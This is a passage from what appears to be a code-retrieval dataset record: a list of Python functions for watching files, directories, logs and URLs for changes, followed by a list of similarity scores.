{filepath}\")\n continue\n\n if \"IN_CLOSE_WRITE\" not in type_names: # Skip anything else as we're after events after a file has been written\n continue\n\n simple_conf, regex_conf = get_watch_job(filepath, config)\n\n if simple_conf: # Process simple files put in directory\n slug = simple_conf[\"slug\"]\n blob_name = f\"{slug}/{filename}\"\n\n upload_file(filepath, simple_conf[\"dsn\"], simple_conf[\"container\"], blob_name)\n\n elif regex_conf: # Check if filepath matches regex\n local_path = filepath.replace(regex_conf[\"base_path\"], \"\").lstrip(\"/\")\n match = re.match(regex_conf[\"regex\"], local_path)\n if not match:\n logging.warning(f\"No watches to cover file: {filename}\")\n continue\n\n match_data = match.groupdict()\n match_data[\"filename\"] = filename\n blob_name = regex_conf[\"dest_path\"].format(**match_data)\n upload_file(filepath, regex_conf[\"dsn\"], regex_conf[\"container\"], blob_name)\n\n else:\n logging.warning(f\"No watches to cover file: {filename}\")\n\n return None", "def test_yaml_file_watch(self):\n # Set initial data\n _setup_template_value('yaml_file_test_values.tmp.yml', 'yaml_file_test_values_1.yml')\n\n with TemplateRenderThread('yaml_file_test.t', 'yaml_file_test.tmp.out') as renderer:\n self.assertStringEqualToTemplateFileWithIterations(renderer.output_data_getter,\n 
'yaml_file_test_values_expected_1.out')\n\n # Set updated data\n print('Updating file..')\n _setup_template_value('yaml_file_test_values.tmp.yml', 'yaml_file_test_values_2.yml')\n self.assertStringEqualToTemplateFileWithIterations(renderer.output_data_getter,\n 'yaml_file_test_values_expected_2.out')", "def watch(self):\n observer = Observer()\n observer.schedule(ActionHandler(self.actionHandler),\n path=self.projectPath,\n recursive=True)\n observer.start()\n try:\n while True:\n sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()", "def process_file(self, filepath, only_if_updated=True):\n raise NotImplementedError()", "def test_change_mtime(self):\n with pike.Graph('g') as graph:\n pike.glob('.', '*') | pike.ChangeListenerNode(fingerprint='mtime')\n self.make_files(foo='a', bar='b')\n ret = graph.run()\n self.assert_files_equal(ret['default'], ['foo', 'bar'])\n new_mtime = time.time() + 1\n os.utime('foo', (new_mtime, new_mtime))\n ret = graph.run()\n self.assert_files_equal(ret['default'], ['foo'])", "def watch_filesystem(ip_queue=None, watch_dir='', notify=False, recursive=False, syncer=None,\n accountant=None, daemon=False):\n event_handler = FSChangesHandler(\n ip_queue=ip_queue,\n notify=notify,\n syncer=syncer,\n accountant=accountant\n )\n observer = Observer()\n observer.schedule(event_handler, path=watch_dir, recursive=recursive)\n\n # If run from simplesync, this will be inside the observer_process process\n observer.daemon = daemon\n observer.start()\n print(\"\\n>> Started observer\\n>> Watching dir: {}\".format(watch_dir))\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n # observer.join()", "def inotify_code_changed():\n wm = pyinotify.WatchManager()\n notifier = pyinotify.Notifier(wm, EventHandler())\n\n def update_watch(sender=None, **kwargs):\n if sender and getattr(sender, 'handles_files', False):\n # No need to update watches when request serves files.\n # (sender is supposed to be a django.core.handlers.BaseHandler subclass)\n return\n\n mask = (\n pyinotify.IN_MODIFY |\n pyinotify.IN_DELETE |\n pyinotify.IN_ATTRIB |\n pyinotify.IN_MOVED_FROM |\n pyinotify.IN_MOVED_TO |\n pyinotify.IN_CREATE |\n pyinotify.IN_DELETE_SELF |\n pyinotify.IN_MOVE_SELF\n )\n\n wm.add_watch('/home/matthew/Projects/mattbot', mask)\n\n # Block until an event happens.\n update_watch()\n notifier.check_events(timeout=None)\n notifier.read_events()\n notifier.process_events()\n notifier.stop()\n\n # If we are here the code must have changed.\n return EventHandler.modified_code", "def watch():\n\n with lcd(FRONTENDDIR):\n cmd = '%(gulp)s watch' % {'gulp': get_gulp()}\n local(cmd)", "def watch(self, url):\n self.__url = url\n self.downtime_info = None\n self.__timer.start()", "def background_import_dir_and_watch(bv):\n background_import_dir(bv, watch=True)", "def on_modified(self, event):\n \n if not event.is_directory: \n\n file_name = os.path.basename(event.src_path)\n \n if file_name not in self.ignore_files:\n parent = os.path.dirname(event.src_path)\n file_id = list(filter(lambda f: f[\"name\"] == file_name, self.filesystem[parent][\"files\"]))[0][\"id\"]\n self.gapy.update_file(file_id, path=parent)\n self.gapy.logger.info(\"The file {} was modified, the content was updated\".format(file_name, parent))\n print(f\"\\nThe file {file_name} was modified and synchronized\")", "def watch(url: str, delay: float) -> None:\n # Get ETag and/or Last-Modified, if there is one.\n req = Request(url)\n with urlopen(req) as f:\n if f.getcode() != 
200:\n logging.error(f\"Got {f.getcode()} for {url}. Exiting.\")\n notify(f\"Got HTTP {f.getcode()}. Exiting.\", url)\n return\n if 'ETag' in f.headers:\n req.add_header('If-None-Match', f.headers['ETag'])\n etag = f.headers['ETag']\n else:\n etag = None\n if 'Last-Modified' in f.headers:\n req.add_header('If-Modified-Since', f.headers['Last-Modified'])\n last_modified = f.headers['Last-Modified']\n else:\n last_modified = None\n md5 = get_md5(f)\n\n logging.debug(f\"{url}: ETag={etag} last_modified={last_modified}\")\n\n done = False\n send_confirmation_at: Optional[float] = time.time() + 10 # seconds\n while not done:\n time.sleep(delay)\n if send_confirmation_at is not None and send_confirmation_at < time.time():\n logging.info(f\"Sending a notification for {url} that we're running.\")\n notify(\"Watching\", url)\n send_confirmation_at = None\n try:\n with urlopen(req) as f:\n if f.getcode() != 200:\n # Maybe these are all covered by exceptions?\n logging.error(f\"Got {f.getcode()} for {url}. Continuing.\")\n continue\n changed = False\n if 'ETag' in f.headers and f.headers['ETag'] != etag:\n changed = True\n if ('Last-Modified' in f.headers and\n f.headers['Last-Modified'] != last_modified):\n changed = True\n if not changed and md5 != get_md5(f):\n changed = True\n if changed:\n notify(\"Site changed\", url)\n logging.info(f\"Sending notification of change to {url}.\")\n done = True\n last_modified = f.headers['Last-Modified']\n except HTTPError as e:\n if e.code == 304:\n logging.debug(f\"{url} not changed.\")\n else:\n notify(f\"Got HTTP error {e.code}. Continuing.\", url)\n logging.error(f\"Got {e.code} for {url}. Continuing.\")\n\n logging.info(f\"Stopping for {url}.\")", "def listening(self):\n # starting point (CheckPoint)\n try:\n last_index = len(re.split('\\n', open(self.path, 'r').read())) - 1\n \n while True:\n \n curr_size = path.getsize(self.path)\n modified_time = path.getmtime(self.path)\n \n time.sleep(.2)\n # Latest.log Either got Archived by Minecraft or a new Instance of Minecraft Opened\n if self.fileSize > curr_size:\n print('\\033[31mDetected Change in Size')\n print('\\033[32mDid You reopen Minecraft?')\n self.fileSize = curr_size\n last_index = len(re.split('\\n', open(self.path, 'r').read())) - 1\n \n # MODIFIED??? 
must be minecraft dumping chat onto lastest.log\n if self.last_time_modified != modified_time:\n \n self.last_time_modified = modified_time\n chat = open(self.path, 'r').read()\n newChatLines = re.split('\\n', chat)[last_index:] # Reads Lines From the last checkpoint\n \n \n \n curr_index = -1\n\n for line in newChatLines:\n\n curr_index += 1\n # if line is not a \\n or \\r tag then our Line checkpoint is the current line\n if line:\n last_index += 1\n \n # Ignores ERRORS / WARNINGS focuses on chat logs\n if '[Client thread/INFO]: [CHAT]' in line:\n\n self.newLineEvent(line)\n # TODO LOGING\n except (FileExistsError, FileNotFoundError, PermissionError, NotADirectoryError) as e:\n err_helper.showError('0x1', e, crash=True)", "def _file_update(self, filename):\n values = TaskInfo._parse_file(filename)\n self._load_dict(values)", "def notify(self, file_info):\n for observer in self._observers:\n observer.update(file_info)", "def watch(self, widget, stylesheet_path):\n self._widget_sheet_map[stylesheet_path].append(widget)\n \n self._watcher = QtCore.QFileSystemWatcher()\n self._watcher.addPath(stylesheet_path)\n \n self._watcher.fileChanged.connect(self.update)\n \n self.update()", "def main(dir_to_watch):\n event_handler = AudioCreatedHandler()\n observer = Observer()\n observer.schedule(event_handler, dir_to_watch, recursive=True)\n observer.start()\n try:\n while True:\n time.sleep(1) \n except KeyboardInterrupt:\n print \"Stopping...\"\n observer.stop()\n observer.join()", "def watch_note(note, handle_func):\n ob = Observer()\n handler = FileSystemEventHandler()\n\n def handle_event(event):\n _, filename = os.path.split(event.src_path)\n if note.filename == filename or os.path.normpath(event.src_path) == os.path.normpath(note.assets):\n handle_func(note)\n handler.on_any_event = handle_event\n\n print('Watching {0}...'.format(note.title))\n ob.schedule(handler, note.notebook.path.abs, recursive=True)\n ob.start()\n\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n print('Stopping...')\n ob.stop()\n ob.join()", "def check_file(modify_times, path):\n try:\n modified = os.stat(path).st_mtime\n except Exception:\n return\n if path not in modify_times:\n modify_times[path] = modified\n if modify_times[path] != modified:\n print('{} modified; restarting server'.format(path))\n modify_times[path] = modified\n start_process()", "def should_watch_dir(self, entry):\n return True", "def _on_watch_changes(self, *changes):\n self.dirty = self._git.is_dirty()\n if self._watcher:\n for change in self._watcher.changes:\n for tracker in self._trackers:\n tracked_path = Path(self._git.working_dir) / change[\"path\"]\n if tracker.path.resolve() == tracked_path.resolve():\n tracker._on_file_change(None)\n return [\n dict(a_path=diff.a_path, b_path=diff.b_path, change_type=diff.change_type)\n for diff in self._git.index.diff(None)\n ] + [\n dict(a_path=None, b_path=ut, change_type=\"U\")\n for ut in self._git.untracked_files\n ]", "def watch(self, name, callback):\n self.external_watchers[name].add(callback)", "def modified(self, eventsrc):\n if not self.has_changed(eventsrc):\n return\n matched = False\n for pattern in self.globs:\n if fnmatch.fnmatch(eventsrc, pattern):\n matched = True\n break\n if matched:\n for action in self.actions:\n action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))\n self.announce()", "def ensure_watch(self):\n if self._stopped:\n self._stopped = False\n self.watch = self.zk_client.DataWatch(self.version_node,\n self._update_version_watch)", "def 
watch():\n sh(\"watchmedo shell-command \\\n --patterns='*.py;*md;' \\\n --recursive \\\n --command='clear && paver build' \\\n .\")", "def update_data(self, url, file_name):\n if file_name == 'upcoming':\n r = self.gosu\n # Thread(target=self.update_upcoming_matches_teams, args=(r,)).start()\n else:\n r = requests.get(url)\n r = r.json()\n with open('files/' + file_name + '.json', 'w') as f:\n json.dump(r, f, indent=4)\n with open('files/' + file_name + '.txt', 'w') as f_: # update date\n f_.write(str(time.time()))", "def last_file_updated(self):\n query = '*.xml'\n keymap_files = glob.glob(query)\n\n sorted_files = sorted(keymap_files, key=self.mtime, reverse=1)\n last_modified_file = sorted_files[0]\n second_last_modified_file = sorted_files[1]\n\n t1 = self.mtime(last_modified_file)\n t2 = self.mtime(second_last_modified_file)\n\n logger.debug('Last modified time: {0}'.format(t1))\n logger.debug('Second Last modified time: {0}'.format(t2))\n\n last_modified_time = self.mtime(last_modified_file)\n last_access_time = self.atime(last_modified_file)\n\n if sys.platform == \"win32\":\n logger.info('Detected Windows environment')\n # self.regenerate_osx(last_access_time, last_modified_time)\n elif sys.platform == 'darwin':\n logger.info('Detected OSX environment')\n # self.regenerate_windows(last_access_time, last_modified_time)\n else:\n logger.error('Unhandled platform: {0}'.format(sys.platform))\n pass", "def run(updater: Updater):\n logger = getLogger()\n logger.info(\"Starting polling\")\n updater.start_polling()", "async def watchForFileSystemEvents(self):\n\n # Things that can throw this off:\n #\n # * Moving a watched directory out of the watch tree (will still\n # generate events even when outside of directory tree)\n #\n # * Doing two changes on a directory or something before the program\n # has a time to handle it (this will also throw off a lot of inotify\n # code, though)\n #\n # * Moving a watched directory within a watched directory will get the\n # wrong path. This needs to use the cookie system to link events\n # together and complete the move properly, which can still make some\n # events get the wrong path if you get file events during the move or\n # something silly like that, since MOVED_FROM and MOVED_TO aren't\n # guaranteed to be contiguous. That exercise is left up to the\n # reader.\n #\n # * Trying to watch a path that doesn't exist won't automatically\n # create it or anything of the sort.\n #\n # * Deleting and recreating or moving the watched directory won't do\n # anything special, but it probably should.\n #\n async for event in self.inotify:\n\n if not self.continueWatchingFS :\n return\n\n # If this is a creation event, add a watch for the new path (and its\n # subdirectories if any)\n #\n if Mask.CREATE in event.mask and event.path is not None :\n await self.watchAPath(event.path)\n\n if Mask.DELETE_SELF in event.mask and event.path is not None :\n await self.unWatchAPath(event.path, event.watch)\n\n # If there are some bits in the cpMask in the event.mask yield this\n # event\n #\n if event.mask & self.cpMask:\n yield event\n else:\n # Note that these events are needed for cleanup purposes.\n # We'll always get IGNORED events so the watch can be removed\n # from the inotify. 
We don't need to do anything with the\n # events, but they do need to be generated for cleanup.\n # We don't need to pass IGNORED events up, because the end-user\n # doesn't have the inotify instance anyway, and IGNORED is just\n # used for management purposes.\n #\n self.logger.debug(f'UNYIELDED EVENT: {event}')", "def parse_update(self, file):\n\n self.new_hashes = []\n self.old_hashes = []\n parsed = self.parse_header(file.readline())\n if parsed:\n (type, version) = parsed\n self.log.debug(\"Received list type: %s, version: %s\" % (type, version))\n pattern = re.compile(HASH_REGEX)\n for line in file:\n m = pattern.search(line)\n if m:\n if m.group(1) == \"+\":\n self.new_hashes.append(m.group(2))\n elif m.group(1) == \"-\":\n self.old_hashes.append(m.group(2))\n\n self._version = int(version)\n else:\n raise SafeBrowsingUpdateError(\"Received bad/empty list, no changes made\")", "def test_watch_graph_changes(self):\n self.make_files(foo='foo', bar='bar')\n with pike.Graph('g') as graph:\n pike.glob('.', '*')\n watcher = pike.watch_graph(graph)\n ret = watcher.run()\n self.assertItemsEqual([f.data.read() for f in ret['default']],\n [b'foo', b'bar'])\n self.make_files(foo='foo', bar='foo')\n ret = watcher.run()\n self.assertItemsEqual([f.data.read() for f in ret['default']],\n [b'foo', b'foo'])", "def _update_versions_watch(self, new_versions_list):\n if self._stopped:\n return False\n\n persistent_update_versions = retry_children_watch_coroutine(\n self.versions_node, self.update_versions\n )\n main_io_loop = IOLoop.instance()\n main_io_loop.add_callback(persistent_update_versions, new_versions_list)", "async def start_watching_roots(self):\n db.clear_visits(self.db_conn)\n for root in self.config.roots:\n await self.watch_tree(root)\n\n for path in db.get_unvisited_files(self.db_conn):\n print(path)\n await self.process_change(path, None)", "def test_inotify(self):\n self.fail(\"write a test\")", "def monitor(self, interval=15):\r\n self.old_files = {}\r\n while True:\r\n try:\r\n self.query()\r\n time.sleep(interval)\r\n print(\"scanning\")\r\n except KeyboardInterrupt:\r\n self.close()\r\n except:\r\n pass", "def modify_input_file(filepath, updated_file_list):\n lines = 0 # current input line number\n file_changed = False # the file has changed\n\n # find and change matching lines\n pattern = re.compile(\"[Cc]opyright\")\n with open(filepath, mode='r', encoding='utf-8', newline='') as file_in:\n for line in file_in:\n lines += 1\n if pattern.search(line) and __old_date in line:\n line = line.replace(__old_date, __new_date)\n file_changed = True\n updated_file_list.append(line)\n return file_changed", "async def update_specific_config(self, filename: str):\n self.general_logger.debug(f\"File {filename} has changed!\")\n try:\n with open(filename, \"r\") as f:\n j = json.load(f)\n except JSONDecodeError:\n self.general_logger.warning(\n f\"File {filename} has changed but contains invalid json data\"\n )\n return\n\n splits = filename.split(os.path.sep)\n commands = [] # List[Cmd]\n sock_paths = [] # type: List[str]\n\n # if it's from the monitors folder:\n if \"monitors\" in filename.split(os.path.sep):\n sockets = self.monitor_sockets\n elif \"scrapers\" in filename.split(os.path.sep):\n sockets = self.scraper_sockets\n else:\n self.general_logger.debug(\"File not useful.\")\n return\n\n # we are interested in configs, whitelists, blacklists, webhooks\n if splits[-1] == \"whitelists.json\":\n cmd = COMMANDS.SET_SPECIFIC_WHITELIST\n elif splits[-1] == \"configs.json\":\n cmd = 
COMMANDS.SET_SPECIFIC_CONFIG\n elif splits[-1] == \"blacklists.json\":\n cmd = COMMANDS.SET_SPECIFIC_BLACKLIST\n elif splits[-1] == \"webhooks.json\":\n cmd = COMMANDS.SET_SPECIFIC_WEBHOOKS\n else:\n return\n\n # for every monitor socket\n for name in sockets:\n if name in j:\n sock_path = sockets[name]\n c = Cmd()\n c.cmd = cmd\n # send only the corresponding part to the monitor\n c.payload = j[name]\n commands.append(c)\n sock_paths.append(sock_path)\n\n # prepare to make all the async requests\n tasks = []\n for sock_path, command in zip(sock_paths, commands):\n tasks.append(self.make_request(sock_path, command))\n\n # send the requests\n responses = await asyncio.gather(*tasks) # List[Response]\n\n for response in responses:\n if response.error.value:\n self.general_logger.warning(\n f\"Failed to update config: {response.error}\"\n )", "def listen(self):\n self.init_delete_batch_processing()\n self.init_file_batch_processing()\n self.init_symlink_batch_processing()\n\n self.loop.create_task(self.start_watching_roots())\n\n self.revisit_cond = asyncio.Condition()\n self.loop.create_task(self.start_polling_revisits())\n\n self.start_polling_changes()\n self.loop.run_forever()\n self.stop_polling_changes()", "def watch_assets(cli_config):\n commands = AssetsCommands(cli_config)\n commands.watch_assets()", "def on_watch(self, payload):\n pass", "def file_last_updated(self, file_last_updated):\n\n self._file_last_updated = file_last_updated", "def _watch(self):\n # self._popen.wait()\n lines_iterator = iter(self._popen.stdout.readline, b\"\")\n for line in lines_iterator:\n line = line.strip()\n # log.log(\"raw\",self.name.upper()+\" SAYS: \"+line)\n # cmd = line.split(' ')[0]\n # args = line.split(' ')[1:]\n if line[0] == '#':\n self.onEvent(line.split(' '))\n if self.onClose:\n self.onEvent([self.onClose])\n self._running.clear()\n if self.stderr is not None:\n self.stderr.close()", "def canReloadWithChange(self, externalFilePath):\n return False", "def file_stat(self, file_path):", "def watch(cfg, keyword):\n try:\n watch_coverage(keyword, cfg)\n except IOError: # broken pipe, for example\n pass", "def start(self):\n self._class_setup()\n\n self._inotify_fd = InotifyFileWatcher._libc.inotify_init()\n if self._inotify_fd < 0:\n error = OSError('failed call to inotify_init')\n error.errno = ctypes.get_errno()\n error.strerror = errno.errorcode[ctypes.get_errno()]\n raise error\n self._inotify_poll = select.poll()\n self._inotify_poll.register(self._inotify_fd, select.POLLIN)\n self._add_watch_for_path(self._directory)", "def on_modified(self, event):\n path = Path(event.src_path)\n if path.is_file() and path.suffix == '.json':\n self.load_configuration(path)\n self.hook(self.configuration)", "def updateFileList(self, fileList):\n\n if fileList == self.fileList:\n return 0\n\n self.mutex.acquire()\n # init = time.time()\n # \n # while(self.bussy):\n # sleep(0.1)\n # if time.time() - init > 2*self.period:\n # return 0\n \n self.fileList = fileList\n self.mutex.release()\n return 1", "def run(self):\n # for running indefinitely if 'watch' is passed\n if self._arguments.watch:\n while True:\n self.watch(self.main(), int(self._arguments.watch))\n else:\n self.main()", "async def start_polling_revisits(self):\n while True:\n now = time.time()\n next_revisit_time, revisit_paths = db.due_for_revisit(self.db_conn, now)\n self.log(\n \"Next revisit time: {} ({}s), due now: {}\".format(\n next_revisit_time,\n (next_revisit_time or now) - now,\n len(revisit_paths),\n )\n )\n\n for path in 
revisit_paths:\n try:\n stats = os.stat(path, follow_symlinks=False)\n except FileNotFoundError:\n stats = None\n await self.process_change(path, stats)\n else:\n if next_revisit_time is None:\n async with self.revisit_cond:\n await self.revisit_cond.wait()\n else:\n await asyncio.sleep(1)", "def refresh(self):\n self.update_from_file()\n self.update_from_env()", "def test_verify_changed_source_file_adjust_mtime(self):\n\n # Get the atime and mtime of the file\n file_info = os.stat('testfiles/various_file_types/executable')\n\n # Set the atime and mtime of the file to the time that we collected, as on some systems\n # the times from a stat call don't match what a utime will set.\n os.utime('testfiles/various_file_types/executable', (file_info.st_atime, file_info.st_mtime))\n\n self.backup(u\"full\", u\"testfiles/various_file_types\", options=[])\n\n # Edit source file\n with open('testfiles/various_file_types/executable', 'r+') as f:\n f.write('This changes a source file.')\n\n # Set the atime and mtime for the file back to what it was prior to the edit\n os.utime('testfiles/various_file_types/executable', (file_info.st_atime, file_info.st_mtime))\n\n # Test verify for the file\n self.verify(u'testfiles/various_file_types/executable', file_to_verify=u'executable', options=[])", "def update( ):\r\n pass", "def check_auto_update(self):\n\n # pylint: disable=W0201\n\n if self.filename is None:\n return\n try:\n filename = self.filename\n timestamp = os.stat(self.filename).st_mtime\n if self.timestamp is None or self.timestamp < timestamp:\n logger.debug(\"Updating %s, timestamp %s\",\n filename, rpki.sundial.datetime.fromtimestamp(timestamp))\n f = open(filename, \"rb\")\n value = f.read()\n f.close()\n self.clear()\n if looks_like_PEM(value):\n self._set_PEM(value)\n else:\n self.DER = value\n self.filename = filename\n self.timestamp = timestamp\n except (IOError, OSError), e:\n now = rpki.sundial.now()\n if self.lastfail is None or now > self.lastfail + self.failure_threshold:\n logger.warning(\"Could not auto_update %r (last failure %s): %s\", self, self.lastfail, e)\n self.lastfail = now\n else:\n self.lastfail = None", "def _touch_file(self, fname):\n if os.path.exists(fname):\n os.utime(fname, None)\n else:\n open(fname, 'a').close()", "def update_freq_dist(filename):\r\n pass", "def _touch_file(self, file_id):\n if file_id in self.touch_list:\n self.touch_list.remove(file_id)\n self.touch_list.append(file_id)", "def do_touch ( self, fspath ):\n return", "def check_for_updates():\n last_version = str(request.urlopen(__source__).read().decode(\"utf8\"))\n if str(open(__file__).read()) != last_version:\n log.warning(\"Theres new Version available!, Update from \" + __source__)\n else:\n log.info(\"No new updates!,You have the lastest version of this app.\")", "def update(self):\n if self._refreshed_at is None or (\n self._refreshed_at + self._refresh_rate <= datetime.datetime.now()):\n\n self.run()", "def update():", "def update():", "def on_change(self, event):\n event_path = event.src_path\n observed_paths = []\n\n for watchdog_path, child_observed_paths in self._watch_dog_observed_paths.items():\n if event_path.startswith(watchdog_path):\n observed_paths += child_observed_paths\n\n if not observed_paths:\n return\n\n changed_paths = []\n for path in observed_paths:\n path_obj = Path(path)\n # The path got deleted\n if not path_obj.exists():\n self._observed_paths.pop(path, None)\n changed_paths += [path]\n else:\n new_checksum = calculate_checksum(path)\n if new_checksum != 
self._observed_paths.get(path, None):\n changed_paths += [path]\n self._observed_paths[path] = new_checksum\n if changed_paths:\n self._input_on_change(changed_paths)", "def watch_logfile(self, logfile_path):\r\n self._run_stats['logSource'] = logfile_path\r\n log_parser = LogParser()\r\n\r\n # For each new line in the logfile ...\r\n output_time = time.time() + WATCH_DISPLAY_REFRESH_SECONDS\r\n try:\r\n firstLine = True\r\n for line in self._tail_file(open(logfile_path),\r\n WATCH_INTERVAL_SECONDS):\r\n if firstLine:\r\n self._run_stats['timeRange']['start'] = get_line_time(line)\r\n self._process_query(line, log_parser)\r\n self._run_stats['timeRange']['end'] = get_line_time(line)\r\n if time.time() >= output_time:\r\n self._output_aggregated_report(sys.stderr)\r\n output_time = time.time() + WATCH_DISPLAY_REFRESH_SECONDS\r\n except KeyboardInterrupt:\r\n sys.stderr.write(\"Interrupt received\\n\")\r\n finally:\r\n self._output_aggregated_report(sys.stdout)\r\n\r\n return 0", "def request_changes(self):\n self._check_if_open()\n data = {\"request-changes\": True}\n return self.post(\"request-changes\", data)", "def update(self):\n try:\n lines = self.get_latest_lines()\n except Exception:\n logger.warning(\"No such logfile: {}\".format(self.filename))\n for pattern, callback in self.patterns:\n for line in lines:\n if re.search(pattern, line):\n callback(pattern, line, lines, self.filename)", "def status_watcher(cs, line):\n #print('status watcher watching')\n\n # from the mullvad code, should watch for\n # things like:\n # \"Initialization Sequence Completed\"\n # \"With Errors\"\n # \"Tap-Win32\"\n\n if \"Completed\" in line:\n cs.change_to(cs.CONNECTED)\n return\n\n if \"Initial packet from\" in line:\n cs.change_to(cs.CONNECTING)\n return", "def deep_watch(self, d: Path) -> None:\n dir_links = [_ for _ in all_subdirs(d) if is_link_to_dir(_)]\n\n for watch_path in [d, *dir_links]:\n self.add_watch(\n str(watch_path),\n pyinotify.ALL_EVENTS,\n rec=True,\n )", "def process_multiple_files(file_path):\n log.debug(\"Process {} is Compressing {}.\".format(os.getpid(), file_path))\n if args.watch:\n previous = int(os.stat(file_path).st_mtime)\n log.info(\"Process {} is Watching {}.\".format(os.getpid(), file_path))\n while True:\n actual = int(os.stat(file_path).st_mtime)\n if previous == actual:\n sleep(60)\n else:\n previous = actual\n log.debug(\"Modification detected on {0}.\".format(file_path))\n check_working_folder(os.path.dirname(file_path))\n if file_path.endswith(\".css\"):\n process_single_css_file(file_path)\n elif file_path.endswith(\".js\"):\n process_single_js_file(file_path)\n else:\n process_single_html_file(file_path)\n else:\n if file_path.endswith(\".css\"):\n process_single_css_file(file_path)\n elif file_path.endswith(\".js\"):\n process_single_js_file(file_path)\n else:\n process_single_html_file(file_path)", "def monitor(self, seconds=1):\r\n\r\n for ts in range(0, seconds):\r\n self.listenFiles = self.listen_files_list(self.listenDir)\r\n FoI = list(set(self.listenFiles)-set(self.logFiles))\r\n if len(FoI) == 0:\r\n time.sleep(1)\r\n else:\r\n self.CHANGE_appendAll() # Can be probamatic for first iter..\r\n return True\r\n\r\n return False", "def autoBuildTick (self, event = None):\r\n for pathname, oldmtime in self.autobuildfiles.iteritems():\r\n newmtime = os.stat(pathname).st_mtime\r\n if newmtime != oldmtime:\r\n #print \"Auto rebuild triggered by: \", pathname\r\n self.autobuildfiles[pathname] = newmtime\r\n self.rebuild()\r\n break", "def update(file: Path, 
validate_assets: bool, external_url: str) -> None:\n\n mutate(file, validate_assets, external_url, upsert=False)", "def watch_file(self, target=None, wait_time=0.1):\n import time\n import signal\n\n def _signal_handler(*args):\n \"\"\"Handle quit signal for plot watching\"\"\"\n self._user_exit = True\n\n signal.signal(signal.SIGINT, _signal_handler)\n pat_builtin = [grep(*x) for x in self._init_builtins()]\n patterns = pat_builtin + self._user_rules\n with open(self.logfile) as fh:\n while (not self.solve_completed) and (not self._user_exit):\n line = fh.readline()\n if not line:\n time.sleep(wait_time)\n elif line.strip():\n for pat in patterns:\n pat.send(line)\n if self._tick and target is not None:\n target.send(self.solve_completed)\n self._tick = False\n if self.solve_completed:\n self._save_state()\n return self._user_exit", "def file_is_modified(filename, lastupdate):\n now = datetime.datetime.utcnow()\n update = file_get_mdatetime(filename)\n return now >= update and update >= lastupdate" ]
[ "0.7057741", "0.68224883", "0.6613068", "0.6612686", "0.65972984", "0.6454981", "0.6450486", "0.6387383", "0.6343412", "0.62934804", "0.6246352", "0.6237782", "0.6216912", "0.6172237", "0.6156002", "0.615293", "0.615024", "0.61491203", "0.61296344", "0.60973674", "0.6014658", "0.60033166", "0.5986758", "0.59192216", "0.5913521", "0.58928555", "0.58895975", "0.5862081", "0.58561414", "0.5847171", "0.58310765", "0.58228505", "0.5819676", "0.5763927", "0.5749769", "0.57307756", "0.5721072", "0.56807274", "0.5656964", "0.5654647", "0.56421435", "0.5518527", "0.5505666", "0.55053943", "0.5504085", "0.5490783", "0.5440263", "0.5438857", "0.54350436", "0.5433892", "0.5422736", "0.54211706", "0.54033065", "0.53984183", "0.5396671", "0.5388692", "0.5385173", "0.53820187", "0.5373532", "0.53445876", "0.533978", "0.5327272", "0.53214616", "0.5310458", "0.5308208", "0.5307285", "0.5298465", "0.52928656", "0.5283235", "0.52714324", "0.5268361", "0.52484936", "0.52451015", "0.5235626", "0.52295756", "0.52248347", "0.5221555", "0.521962", "0.52184796", "0.5212345", "0.52080023", "0.51978606", "0.5196855", "0.5185014", "0.51687783", "0.5157211", "0.51446736", "0.51446736", "0.5140161", "0.5139321", "0.51370776", "0.5134819", "0.5131411", "0.51180136", "0.51070845", "0.5097455", "0.50961614", "0.5093382", "0.5092745", "0.50868744" ]
0.5519304
41
Get CPF data for a given date. The ephemeris data is stored in a dictionary with tables of times and position under the "positions" key. This table is interpolated in the calculate_initial_values method.
def get_ephemeris(rundate, sat_name):
    file_key = "slr_ephemeris"
    ephemeris_data = get_satellite_vars(sat_name)
    provider_list = config.tech.prediction_providers.list

    # Find the latest version of the observation file
    versions = config.files.glob_variable(file_key, "version", r"\d+", file_vars=ephemeris_data)

    try:
        ephemeris_data["version"] = sorted(versions)[-1]
        providers = config.files.glob_variable(file_key, "provider", r"\w+", file_vars=ephemeris_data)
        for provider in provider_list:
            if provider in providers:
                ephemeris_data["provider"] = provider
                break
        else:
            log.fatal(f"No valid provider found: {', '.join(providers)}")
    except IndexError:
        log.info("No ephemeris data found")
        log.info(f"Download manually from https://cddis.nasa.gov/archive/slr/cpf_predicts/{rundate.year}/{sat_name}")
        log.fatal(f"Please save missing file as '{config.files.path(file_key)}' !")
    eph_parser = parsers.parse_key(file_key, file_vars=ephemeris_data)
    eph = calculate_initial_values(eph_parser.as_dict(), rundate)
    return eph
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calculate_initial_values(eph, rundate):\n data = sorted(eph[\"positions\"].items())\n pos_itrs = np.zeros((len(data), 3))\n mjd1, mjd2 = zip(*[t for t, d in data])\n rotation_mat = rotation.trs2gcrs(time.Time(val=mjd1, val2=mjd2, fmt=\"mjd\", scale=\"utc\"))\n tbl = time.Time(val=mjd1, val2=mjd2, fmt=\"mjd\", scale=\"utc\")\n\n for i in range(0, len(data)):\n pos_itrs[i] = data[i][1][\"pos\"]\n\n diffsec = np.array([(t - rundate).total_seconds() for t in tbl.utc.datetime])\n\n # Table given in ITRF coordinate system. Convert to GCRS, where the integration of the satellite orbit will\n # be done\n\n pos_gcrs = np.sum(rotation_mat @ pos_itrs[:, :, None], axis=2)\n log.info(\"Interpolating data from prediction file in order to get initial pos/vel\")\n pos_gcrs_ip, vel_gcrs_ip = interpolation.interpolate_with_derivative(\n diffsec, pos_gcrs, np.array([0.0]), kind=\"lagrange\", window=10, bounds_error=False\n )\n eph[\"initial_pos\"] = pos_gcrs_ip[0]\n eph[\"initial_vel\"] = vel_gcrs_ip[0]\n\n return eph", "def get_data_date(self, date):\n data = {}\n for stock in self.stocks:\n data[stock] = self.stock_data[stock].to_stock_dataframe_day(date)\n return data", "def readProcessedFCD():\n procFcdDict = {}\n pqDateDict = {} # each date is a period / quota tupel assigned\n simDate = '2007-07-18 '\n day = 0\n # create keys for the procFcdDict\n for p in period:\n for q in quota:\n day += 86400\n date, time = calcTime.getDateFromDepart(day).split(\" \")\n pqDateDict.setdefault(date, (p, q))\n procFcdDict.setdefault((p, q), {})\n # print date,p,q\n\n inputFile = open(path.FQprocessedFCD, 'r')\n for line in inputFile:\n timestamp, edge, speed, 